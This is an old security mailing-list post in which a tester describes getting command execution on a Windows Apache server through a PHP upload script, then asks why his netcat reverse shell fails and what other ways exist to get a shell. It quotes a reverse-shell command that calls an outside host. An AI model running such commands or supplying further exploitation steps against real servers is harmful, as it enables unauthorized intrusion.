php and netcat?

["Maarten" <secfocus () hartsuijker com>]

Hi,

I am testing a windows based apache server, that's got php and mysql
installed on it. I found a php script that allows uploading other php
scripts. The upload directory is also readable and executable. So I have
uploaded some of my own scripts and can execute any command I want using
`cmd /c command.exe`

I am looking for ways to further exploit this server. The file system is
probably "everyone full control". Have not tested that yet. What I tried to
do was using netcat to send a command shell to my own machine (cmd /c nc
333.333.333.333 333 -e cmd.exe). I can see with tcpdump that the webserver
contacts my own machine on port 333, however, I do not get a command prompt
like I am getting when running the same netcat command from the command
prompt of a windows machine. Anyone know why?

If anyone knows an alternative to get a shell on the server, I would also
appreciate it. Of course I can run any command through php, but there should
be alternatives..... An alternative to my netcat idea is also
appreciated }-)

maarten



----------------------------------------------------------------------------

Do you know the base address of the Global Offset Table (GOT) on a Solaris 8
box?
CORE IMPACT does.
www.securityfocus.com/core